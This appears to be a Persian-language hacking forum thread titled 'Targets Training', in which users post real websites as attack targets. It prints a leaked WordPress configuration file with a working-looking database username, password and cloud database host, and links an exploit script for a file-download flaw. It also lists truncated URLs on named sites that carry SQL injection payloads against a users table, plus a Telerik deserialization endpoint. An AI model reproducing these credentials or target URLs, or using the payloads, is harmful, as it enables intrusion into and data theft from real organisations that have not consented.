اطلاعیه
بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .
Targets Training
بستن
X
-
-
-
آسیب پذیری : Configuration file source code disclosure
دسترسی مستقیم به اطلاعات دیتابیس / علت عدم دقت و کانفیگ صحیح وبمستر
کد:<?php // Add this to the top of your wp-config.php file. // Handle reverse proxy, passing the IP to the server. // This is used by some plugins to fetch the user's IP. //if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { // $ips = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); // $_SERVER['REMOTE_ADDR'] = $ips[0]; //} /** * The base configurations of the WordPress. * * This file has the following configurations: MySQL settings, Table Prefix, * Secret Keys, WordPress Language, and ABSPATH. You can find more information * by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing * wp-config.php} Codex page. You can get the MySQL settings from your web host. * * This file is used by the wp-config.php creation script during the * installation. You don't have to use the web site, you can just copy this file * to "wp-config.php" and fill in the values. * * @package WordPress */ if ($_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') $_SERVER['HTTPS']='on'; // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'blog_pre-release'); /** MySQL database username */ define('DB_USER', 'fotor-wordpress'); /** MySQL database password */ define('DB_PASSWORD', 'h6Q2kCFJdwsxX$Ew'); /** MySQL hostname */ define('DB_HOST', 'fotor.czizywqdyvci.us-west-2.rds.amazonaws.com'); /** Database Charset to use in creating database tables. */ define('DB_CHARSET', 'utf8'); /** The Database Collate type. Don't change this if in doubt. */ define('DB_COLLATE', ''); /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * [USER="316"]since[/USER] 2.6.0 */ define('AUTH_KEY', 'put your unique phrase here'); define('SECURE_AUTH_KEY', 'put your unique phrase here'); define('LOGGED_IN_KEY', 'put your unique phrase here'); define('NONCE_KEY', 'put your unique phrase here'); define('AUTH_SALT', 'put your unique phrase here'); define('SECURE_AUTH_SALT', 'put your unique phrase here'); define('LOGGED_IN_SALT', 'put your unique phrase here'); define('NONCE_SALT', 'put your unique phrase here'); /**#@-*/ /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each a unique * prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'b_'; /** * WordPress Localized Language, defaults to English. * * Change this to localize WordPress. A corresponding MO file for the chosen * language must be installed to wp-content/languages. For example, install * de_DE.mo to wp-content/languages and set WPLANG to 'de_DE' to enable German * language support. */ define('WPLANG', ''); /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. */ define('WP_DEBUG', false); /* That's all, stop editing! Happy blogging. */ /** Absolute path to the WordPress directory. */ if ( !defined('ABSPATH') ) define('ABSPATH', dirname(__FILE__) . '/'); /** Sets up WordPress vars and included files. */ require_once(ABSPATH . 'wp-settings.php'); /**define('WP_HOME','http://www.fotor.com/blog');*/ /**define('WP_SITEURL','http://www.fotor.com/blog');*/ // in some setups HTTP_X_FORWARDED_PROTO might contain // a comma-separated list e.g. http,https // so check for https existence
- Likes 1
نظر
-
Exploit: https://github.com/MrFalconn/Slider-...ain/exploit.py
================================================== ====================
File Download
===================
:Targets
ANOHA Consulting Découvrez ANOHA, la référence tunisienne du conseil et de l'assistance technique pour un développement économique et social durable. Grâce à notre expertise éprouvée et à nos solutions innovantes, nous garantissons des prestations de qualité, axées sur des résultats tangibles et mesurables. Nous mettons l'accent sur l'appropriation par les bénéficiaires, en offrant des solutions
دیدم حال میده گفتم بزارم
- Likes 1
نظر
-
نوشته اصلی توسط Mr.Falcon نمایش پست هاExploit: https://github.com/MrFalconn/Slider-...ain/exploit.py
================================================== ====================
File Download
===================
:Targets
ANOHA Consulting Découvrez ANOHA, la référence tunisienne du conseil et de l'assistance technique pour un développement économique et social durable. Grâce à notre expertise éprouvée et à nos solutions innovantes, nous garantissons des prestations de qualité, axées sur des résultats tangibles et mesurables. Nous mettons l'accent sur l'appropriation par les bénéficiaires, en offrant des solutions
دیدم حال میده گفتم بزارم
- Likes 1
نظر
-
Cors Origin
==================================================
نظر
-
sql injection
===============================================
- Likes 1
نظر
-
insecure deserialization
---------------------------------------
https://election.ptaa.org.ph/Telerik...e.axd?type=rau
----------------------------
sql injection
----------------------------
https://estetica-avanzada.com/catego...rom+crud_users
--------------------------------------------------------------------------------
http://jessicalimoni.com/property-fo...m+crud_users--
عیدتان مبارکویرایش توسط Mr.Falcon : https://www.iranhack.com/forum/member/6671-mr-falcon در ساعت 03-21-2022, 04:19 PM
- Likes 1
نظر
نظر